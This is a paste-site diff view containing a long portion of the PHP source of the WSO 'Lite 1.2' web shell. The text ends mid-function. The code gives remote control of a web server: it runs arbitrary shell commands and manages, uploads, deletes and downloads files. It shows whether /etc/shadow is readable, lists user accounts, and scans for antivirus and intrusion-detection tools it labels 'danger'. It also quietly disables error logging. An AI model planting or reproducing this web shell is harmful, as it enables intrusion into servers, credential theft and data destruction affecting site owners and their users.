View difference between Paste ID: SXiHkz0K and rsMZkqfb
SHOW: | | - or go back to the newest paste.
1
<?php 
2
$color = "#df5"; 
3
$default_action = 'FilesMan'; 
4
$default_use_ajax = true; 
5
$default_charset = 'Windows-1251';  
6
  
7
@session_start(); 
8
@ini_set('error_log',NULL); 
9
@ini_set('log_errors',0); 
10
@ini_set('max_execution_time',0); 
11
@set_time_limit(0); 
12
@set_magic_quotes_runtime(0); 
13
@define('WSO_VERSION', 'Lite 1.2'); 
14
  
15
if(get_magic_quotes_gpc()) { 
16
    function WSOstripslashes($array) { 
17
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array); 
18
    } 
19
    $_POST = WSOstripslashes($_POST); 
20
}
21
  
22
if(strtolower(substr(PHP_OS,0,3)) == "win") 
23
    $os = 'win'; 
24
else
25
    $os = 'nix'; 
26
  
27
$safe_mode = @ini_get('safe_mode'); 
28
if(!$safe_mode) 
29
    error_reporting(0); 
30
  
31
$disable_functions = @ini_get('disable_functions'); 
32
$home_cwd = @getcwd(); 
33
if(isset($_POST['c'])) 
34
    @chdir($_POST['c']); 
35
$cwd = @getcwd(); 
36
if($os == 'win') { 
37
    $home_cwd = str_replace("\\", "/", $home_cwd); 
38
    $cwd = str_replace("\\", "/", $cwd); 
39
} 
40
if($cwd[strlen($cwd)-1] != '/' ) 
41
    $cwd .= '/';  
42
      
43
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'])) 
44
    $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$GLOBALS['default_use_ajax']; 
45
  
46
function wsoHeader() { 
47
    if(empty($_POST['charset'])) 
48
        $_POST['charset'] = $GLOBALS['default_charset']; 
49
    global $color; 
50
    echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>WSO " . WSO_VERSION ."</title> 
51
<style> 
52
body{background-color:#444;color:#e1e1e1;}  
53
body,td,th{font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1;}  
54
table.info{color:#fff;background-color:#222;}
55
span,h1,a{color: $color !important;}  
56
span{font-weight: bolder;}  
57
h1{border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px;}
58
div.content{padding: 5px;margin-left:5px;background-color:#333;}  
59
a{text-decoration:none;}  
60
a:hover{text-decoration:underline;}
61
.ml1{border:1px solid #444;padding:5px;margin:0;overflow: auto;}  
62
.bigarea{width:100%;height:300px;}
63
input,textarea,select{margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New';}  
64
form{margin:0px;}  
65
#toolsTbl{text-align:center;}  
66
.toolsInp{width: 80%;}  
67
.main th{text-align:left;background-color:#5e5e5e;}  
68
.main tr:hover{background-color:#5e5e5e}  
69
.main td, th{vertical-align:middle}  
70
.l1{background-color:#444}
71
pre{font-family:Courier,Monospace} 
72
</style> 
73
<script> 
74
    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; 
75
    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
76
    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."'; 
77
    var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."'; 
78
    var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."'; 
79
    var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."'; 
80
    var d = document; 
81
    function set(a,c,p1,p2,p3,charset) { 
82
        if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; 
83
        if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; 
84
        if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; 
85
        if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; 
86
        if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; 
87
        if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; 
88
    } 
89
    function g(a,c,p1,p2,p3,charset) { 
90
        set(a,c,p1,p2,p3,charset); 
91
        d.mf.submit(); 
92
    } 
93
    function a(a,c,p1,p2,p3,charset) { 
94
        set(a,c,p1,p2,p3,charset); 
95
        var params = 'ajax=true'; 
96
        for(i=0;i<d.mf.elements.length;i++) 
97
            params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); 
98
        sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params); 
99
    } 
100
    function sr(url, params) { 
101
        if (window.XMLHttpRequest) 
102
            req = new XMLHttpRequest(); 
103
        else if (window.ActiveXObject) 
104
            req = new ActiveXObject('Microsoft.XMLHTTP'); 
105
        if (req) { 
106
            req.onreadystatechange = processReqChange; 
107
            req.open('POST', url, true); 
108
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); 
109
            req.send(params); 
110
        } 
111
    } 
112
    function processReqChange() { 
113
        if( (req.readyState == 4) ) 
114
            if(req.status == 200) { 
115
                var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); 
116
                var arr=reg.exec(req.responseText); 
117
                eval(arr[2].substr(0, arr[1])); 
118
            } else alert('Request error!'); 
119
    } 
120
</script> 
121
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> 
122
<form method=post name=mf style='display:none;'> 
123
<input type=hidden name=a> 
124
<input type=hidden name=c> 
125
<input type=hidden name=p1> 
126
<input type=hidden name=p2> 
127
<input type=hidden name=p3> 
128
<input type=hidden name=charset> 
129
</form>"; 
130
    $freeSpace = @diskfreespace($GLOBALS['cwd']); 
131
    $totalSpace = @disk_total_space($GLOBALS['cwd']); 
132
    $totalSpace = $totalSpace?$totalSpace:1; 
133
    $release = @php_uname('r'); 
134
    $kernel = @php_uname('s'); 
135
    if(!function_exists('posix_getegid')) { 
136
        $user = @get_current_user(); 
137
        $uid = @getmyuid(); 
138
        $gid = @getmygid(); 
139
        $group = "?"; 
140
    } else { 
141
        $uid = @posix_getpwuid(posix_geteuid()); 
142
        $gid = @posix_getgrgid(posix_getegid()); 
143
        $user = $uid['name']; 
144
        $uid = $uid['uid']; 
145
        $group = $gid['name']; 
146
        $gid = $gid['gid']; 
147
    } 
148
  
149
    $cwd_links = ''; 
150
    $path = explode("/", $GLOBALS['cwd']); 
151
    $n=count($path); 
152
    for($i=0; $i<$n-1; $i++) { 
153
        $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; 
154
        for($j=0; $j<=$i; $j++) 
155
            $cwd_links .= $path[$j].'/'; 
156
        $cwd_links .= "\")'>".$path[$i]."/</a>"; 
157
    } 
158
  
159
    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); 
160
    $opt_charsets = ''; 
161
    foreach($charsets as $item) 
162
        $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>'; 
163
  
164
    $m = array('Sec Info'=>'SecInfo','Files'=>'FilesMan','Exec'=>'Console','Sql'=>'Sql','Network'=>'Network'); 
165
    $menu = ''; 
166
    foreach($m as $k => $v) 
167
        $menu .= '<th width="'.(int)(100/count($m)).'%">[<a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a>]</th>'; 
168
  
169
    $drives = ""; 
170
    if($GLOBALS['os'] == 'win') { 
171
        foreach(range('c','z') as $drive) 
172
        if(is_dir($drive.':\\')) 
173
            $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; 
174
    } 
175
    echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'
176
       . '<td><nobr>' . substr(@php_uname(), 0, 120) . '</nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=green><b>OFF</b></font>') 
177
       . '<span> Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'
178
       . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'
179
       . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">'; 
180
} 
181
  
182
function wsoFooter() { 
183
    $is_writable = is_writable($GLOBALS['cwd'])?" <font color='green'>(Writeable)</font>":" <font color=red>(Not writable)</font>"; 
184
    echo " 
185
</div> 
186
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'> 
187
    <tr> 
188
        <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td> 
189
        <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> 
190
    </tr><tr> 
191
        <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> 
192
        <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> 
193
    </tr><tr> 
194
        <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> 
195
        <td><form method='post' ENCTYPE='multipart/form-data'> 
196
        <input type=hidden name=a value='FilesMAn'> 
197
        <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'> 
198
        <input type=hidden name=p1 value='uploadFile'> 
199
        <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'> 
200
        <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td> 
201
  
202
    </tr></table></div></body></html>"; 
203
} 
204
  
205
if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { 
206
    function posix_getpwuid($p) {return false;} } 
207
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { 
208
    function posix_getgrgid($p) {return false;} } 
209
  
210
function wsoEx($in) { 
211
    $out = ''; 
212
    if (function_exists('exec')) { 
213
        @exec($in,$out); 
214
        $out = @join("\n",$out); 
215
    } elseif (function_exists('passthru')) { 
216
        ob_start(); 
217
        @passthru($in); 
218
        $out = ob_get_clean(); 
219
    } elseif (function_exists('system')) { 
220
        ob_start(); 
221
        @system($in); 
222
        $out = ob_get_clean(); 
223
    } elseif (function_exists('shell_exec')) { 
224
        $out = shell_exec($in); 
225
    } elseif (is_resource($f = @popen($in,"r"))) { 
226
        $out = ""; 
227
        while(!@feof($f)) 
228
            $out .= fread($f,1024); 
229
        pclose($f); 
230
    } 
231
    return $out; 
232
} 
233
function wsoViewSize($s) { 
234
    if($s >= 1073741824) 
235
        return sprintf('%1.2f', $s / 1073741824 ). ' GB'; 
236
    elseif($s >= 1048576) 
237
        return sprintf('%1.2f', $s / 1048576 ) . ' MB'; 
238
    elseif($s >= 1024) 
239
        return sprintf('%1.2f', $s / 1024 ) . ' KB'; 
240
    else
241
        return $s . ' B'; 
242
} 
243
  
244
function wsoPerms($p) { 
245
    if (($p & 0xC000) == 0xC000)$i = 's'; 
246
    elseif (($p & 0xA000) == 0xA000)$i = 'l'; 
247
    elseif (($p & 0x8000) == 0x8000)$i = '-'; 
248
    elseif (($p & 0x6000) == 0x6000)$i = 'b'; 
249
    elseif (($p & 0x4000) == 0x4000)$i = 'd'; 
250
    elseif (($p & 0x2000) == 0x2000)$i = 'c'; 
251
    elseif (($p & 0x1000) == 0x1000)$i = 'p'; 
252
    else $i = 'u'; 
253
    $i .= (($p & 0x0100) ? 'r' : '-'); 
254
    $i .= (($p & 0x0080) ? 'w' : '-'); 
255
    $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); 
256
    $i .= (($p & 0x0020) ? 'r' : '-'); 
257
    $i .= (($p & 0x0010) ? 'w' : '-'); 
258
    $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); 
259
    $i .= (($p & 0x0004) ? 'r' : '-'); 
260
    $i .= (($p & 0x0002) ? 'w' : '-'); 
261
    $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); 
262
    return $i; 
263
} 
264
  
265
function wsoPermsColor($f) { 
266
    if (!@is_readable($f)) 
267
        return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>'; 
268
    elseif (!@is_writable($f)) 
269
        return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>'; 
270
    else
271
        return '<font color=green>' . wsoPerms(@fileperms($f)) . '</font>'; 
272
} 
273
  
274
if(!function_exists("scandir")) { 
275
    function scandir($dir) { 
276
        $dh  = opendir($dir); 
277
        while (false !== ($filename = readdir($dh))) 
278
            $files[] = $filename; 
279
        return $files; 
280
    } 
281
} 
282
  
283
function wsoWhich($p) { 
284
    $path = wsoEx('which ' . $p); 
285
    if(!empty($path)) 
286
        return $path; 
287
    return false; 
288
} 
289
  
290
function actionSecInfo() { 
291
    wsoHeader(); 
292
    echo '<h1>Server security information</h1><div class=content>'; 
293
    function wsoSecParam($n, $v) { 
294
        $v = trim($v); 
295
        if($v) { 
296
            echo '<span>' . $n . ': </span>'; 
297
            if(strpos($v, "\n") === false) 
298
                echo $v . '<br>'; 
299
            else
300
                echo '<pre class=ml1>' . $v . '</pre>'; 
301
        } 
302
    } 
303
  
304
    wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); 
305
    if(function_exists('apache_get_modules')) 
306
        wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); 
307
    wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); 
308
    wsoSecParam('Open base dir', @ini_get('open_basedir')); 
309
    wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); 
310
    wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); 
311
    wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); 
312
    $temp=array(); 
313
    if(function_exists('mysql_get_client_info')) 
314
        $temp[] = "MySql (".mysql_get_client_info().")"; 
315
    if(function_exists('mssql_connect')) 
316
        $temp[] = "MSSQL"; 
317
    if(function_exists('pg_connect')) 
318
        $temp[] = "PostgreSQL"; 
319
    if(function_exists('oci_connect')) 
320
        $temp[] = "Oracle"; 
321
    wsoSecParam('Supported databases', implode(', ', $temp)); 
322
    echo '<br>'; 
323
  
324
    if($GLOBALS['os'] == 'nix') { 
325
        wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); 
326
        wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no'); 
327
        wsoSecParam('OS version', @file_get_contents('/proc/version')); 
328
        wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); 
329
        if(!$GLOBALS['safe_mode']) { 
330
            $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); 
331
            $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); 
332
            $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); 
333
            echo '<br>'; 
334
            $temp=array(); 
335
            foreach ($userful as $item) 
336
                if(wsoWhich($item)) 
337
                    $temp[] = $item; 
338
            wsoSecParam('Userful', implode(', ',$temp)); 
339
            $temp=array(); 
340
            foreach ($danger as $item) 
341
                if(wsoWhich($item)) 
342
                    $temp[] = $item; 
343
            wsoSecParam('Danger', implode(', ',$temp)); 
344
            $temp=array(); 
345
            foreach ($downloaders as $item) 
346
                if(wsoWhich($item)) 
347
                    $temp[] = $item; 
348
            wsoSecParam('Downloaders', implode(', ',$temp)); 
349
            echo '<br/>'; 
350
            wsoSecParam('HDD space', wsoEx('df -h')); 
351
            wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); 
352
        } 
353
    } else { 
354
        wsoSecParam('OS Version',wsoEx('ver')); 
355
        wsoSecParam('Account Settings',wsoEx('net accounts')); 
356
        wsoSecParam('User Accounts',wsoEx('net user')); 
357
    } 
358
    echo '</div>'; 
359
    wsoFooter(); 
360
} 
361
  
362
function actionFilesMan() { 
363
    wsoHeader(); 
364
    echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; 
365
    if(!empty($_POST['p1'])) { 
366
        switch($_POST['p1']) { 
367
            case 'uploadFile': 
368
                if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) 
369
                    echo "Can't upload file!"; 
370
                break; 
371
            case 'mkdir': 
372
                if(!@mkdir($_POST['p2'])) 
373
                    echo "Can't create new dir"; 
374
                break; 
375
            case 'delete': 
376
                function deleteDir($path) { 
377
                    $path = (substr($path,-1)=='/') ? $path:$path.'/'; 
378
                    $dh  = opendir($path); 
379
                    while ( ($item = readdir($dh) ) !== false) { 
380
                        $item = $path.$item; 
381
                        if ( (basename($item) == "..") || (basename($item) == ".") ) 
382
                            continue; 
383
                        $type = filetype($item); 
384
                        if ($type == "dir") 
385
                            deleteDir($item); 
386
                        else
387
                            @unlink($item); 
388
                    } 
389
                    closedir($dh); 
390
                    @rmdir($path); 
391
                } 
392
                if(is_array(@$_POST['f'])) 
393
                    foreach($_POST['f'] as $f) { 
394
                        if($f == '..') 
395
                            continue; 
396
                        $f = urldecode($f); 
397
                        if(is_dir($f)) 
398
                            deleteDir($f); 
399
                        else
400
                            @unlink($f); 
401
                    } 
402
                break; 
403
            case 'paste': 
404
                if($_SESSION['act'] == 'copy') { 
405
                    function copy_paste($c,$s,$d){ 
406
                        if(is_dir($c.$s)){ 
407
                            mkdir($d.$s); 
408
                            $h = @opendir($c.$s); 
409
                            while (($f = @readdir($h)) !== false) 
410
                                if (($f != ".") and ($f != "..")) 
411
                                    copy_paste($c.$s.'/',$f, $d.$s.'/'); 
412
                        } elseif(is_file($c.$s)) 
413
                            @copy($c.$s, $d.$s); 
414
                    } 
415
                    foreach($_SESSION['f'] as $f) 
416
                        copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']); 
417
                } elseif($_SESSION['act'] == 'move') { 
418
                    function move_paste($c,$s,$d){ 
419
                        if(is_dir($c.$s)){ 
420
                            mkdir($d.$s); 
421
                            $h = @opendir($c.$s); 
422
                            while (($f = @readdir($h)) !== false) 
423
                                if (($f != ".") and ($f != "..")) 
424
                                    copy_paste($c.$s.'/',$f, $d.$s.'/'); 
425
                        } elseif(@is_file($c.$s)) 
426
                            @copy($c.$s, $d.$s); 
427
                    } 
428
                    foreach($_SESSION['f'] as $f) 
429
                        @rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f); 
430
                } elseif($_SESSION['act'] == 'zip') { 
431
                    if(class_exists('ZipArchive')) { 
432
                        $zip = new ZipArchive(); 
433
                        if ($zip->open($_POST['p2'], 1)) { 
434
                            chdir($_SESSION['c']); 
435
                            foreach($_SESSION['f'] as $f) { 
436
                                if($f == '..') 
437
                                    continue; 
438
                                if(@is_file($_SESSION['c'].$f)) 
439
                                    $zip->addFile($_SESSION['c'].$f, $f); 
440
                                elseif(@is_dir($_SESSION['c'].$f)) { 
441
                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/')); 
442
                                    foreach ($iterator as $key=>$value) { 
443
                                        $zip->addFile(realpath($key), $key); 
444
                                    } 
445
                                } 
446
                            } 
447
                            chdir($GLOBALS['cwd']); 
448
                            $zip->close(); 
449
                        } 
450
                    } 
451
                } elseif($_SESSION['act'] == 'unzip') { 
452
                    if(class_exists('ZipArchive')) { 
453
                        $zip = new ZipArchive(); 
454
                        foreach($_SESSION['f'] as $f) { 
455
                            if($zip->open($_SESSION['c'].$f)) { 
456
                                $zip->extractTo($GLOBALS['cwd']); 
457
                                $zip->close(); 
458
                            } 
459
                        } 
460
                    } 
461
                } elseif($_SESSION['act'] == 'tar') { 
462
                    chdir($_SESSION['c']); 
463
                    $_SESSION['f'] = array_map('escapeshellarg', $_SESSION['f']); 
464
                    wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_SESSION['f'])); 
465
                    chdir($GLOBALS['cwd']); 
466
                } 
467
                unset($_SESSION['f']); 
468
                break; 
469
            default: 
470
                if(!empty($_POST['p1'])) { 
471
                    $_SESSION['act'] = @$_POST['p1']; 
472
                    $_SESSION['f'] = @$_POST['f']; 
473
                    foreach($_SESSION['f'] as $k => $f) 
474
                        $_SESSION['f'][$k] = urldecode($f); 
475
                    $_SESSION['c'] = @$_POST['c']; 
476
                } 
477
                break; 
478
        } 
479
    } 
480
    $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); 
481
    if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; } 
482
    global $sort; 
483
    $sort = array('name', 1); 
484
    if(!empty($_POST['p1'])) { 
485
        if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) 
486
            $sort = array($match[1], (int)$match[2]); 
487
    } 
488
echo "<script> 
489
    function sa() { 
490
        for(i=0;i<d.files.elements.length;i++) 
491
            if(d.files.elements[i].type == 'checkbox') 
492
                d.files.elements[i].checked = d.files.elements[0].checked; 
493
    } 
494
  
495
</script> 
496
<table width='100%' class='main' cellspacing='0' cellpadding='2'> 
497
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; 
498
    $dirs = $files = array(); 
499
    $n = count($dirContent); 
500
    for($i=0;$i<$n;$i++) { 
501
        $ow = @posix_getpwuid(@fileowner($dirContent[$i])); 
502
        $gr = @posix_getgrgid(@filegroup($dirContent[$i])); 
503
        $tmp = array('name' => $dirContent[$i], 
504
                     'path' => $GLOBALS['cwd'].$dirContent[$i], 
505
                     'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 
506
                     'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 
507
                     'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 
508
                     'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 
509
                     'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) 
510
                    ); 
511
        if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) 
512
            $files[] = array_merge($tmp, array('type' => 'file')); 
513
        elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) 
514
            $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); 
515
        elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != ".")) 
516
            $dirs[] = array_merge($tmp, array('type' => 'dir')); 
517
    } 
518
    $GLOBALS['sort'] = $sort; 
519
    function wsoCmp($a, $b) { 
520
        if($GLOBALS['sort'][0] != 'size') 
521
            return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); 
522
        else
523
            return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); 
524
    } 
525
    usort($files, "wsoCmp"); 
526
    usort($dirs, "wsoCmp"); 
527
    $files = array_merge($dirs, $files); 
528
    $l = 0; 
529
    foreach($files as $f) { 
530
        echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] 
531
            .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; 
532
        $l = $l?0:1; 
533
    } 
534
    echo "<tr><td colspan=7> 
535
  
536
    <input type=hidden name=a value='FilesMan'> 
537
    <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> 
538
    <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'> 
539
    <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; 
540
    if(class_exists('ZipArchive')) 
541
        echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>"; 
542
    echo "<option value='tar'>Compress (tar.gz)</option>"; 
543
    if(!empty($_SESSION['act']) && @count($_SESSION['f'])) 
544
        echo "<option value='paste'>Paste / Compress</option>"; 
545
    echo "</select>&nbsp;"; 
546
    if(!empty($_SESSION['act']) && @count($_SESSION['f']) && (($_SESSION['act'] == 'zip') || ($_SESSION['act'] == 'tar'))) 
547
        echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_SESSION['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;"; 
548
    echo "<input type='submit' value='>>'></td></tr></form></table></div>"; 
549
    wsoFooter(); 
550
} 
551
552
function actionFilesTools() { 
553
    if( isset($_POST['p1']) ) 
554
        $_POST['p1'] = urldecode($_POST['p1']); 
555
    if(@$_POST['p2']=='download') { 
556
        if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { 
557
            ob_start("ob_gzhandler", 4096); 
558
            header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); 
559
            if (function_exists("mime_content_type")) { 
560
                $type = @mime_content_type($_POST['p1']); 
561
                header("Content-Type: " . $type); 
562
            } else
563
                header("Content-Type: application/octet-stream"); 
564
            $fp = @fopen($_POST['p1'], "r"); 
565
            if($fp) { 
566
                while(!@feof($fp)) 
567
                    echo @fread($fp, 1024); 
568
                fclose($fp); 
569
            } 
570
        }exit; 
571
    } 
572
    if( @$_POST['p2'] == 'mkfile' ) { 
573
        if(!file_exists($_POST['p1'])) { 
574
            $fp = @fopen($_POST['p1'], 'w'); 
575
            if($fp) { 
576
                $_POST['p2'] = "edit"; 
577
                fclose($fp); 
578
            } 
579
        } 
580
    } 
581
    wsoHeader(); 
582
    echo '<h1>File tools</h1><div class=content>'; 
583
    if( !file_exists(@$_POST['p1']) ) { 
584
        echo 'File not exists'; 
585
        wsoFooter(); 
586
        return; 
587
    } 
588
    $uid = @posix_getpwuid(@fileowner($_POST['p1'])); 
589
    if(!$uid) { 
590
        $uid['name'] = @fileowner($_POST['p1']); 
591
        $gid['name'] = @filegroup($_POST['p1']); 
592
    } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); 
593
    echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; 
594
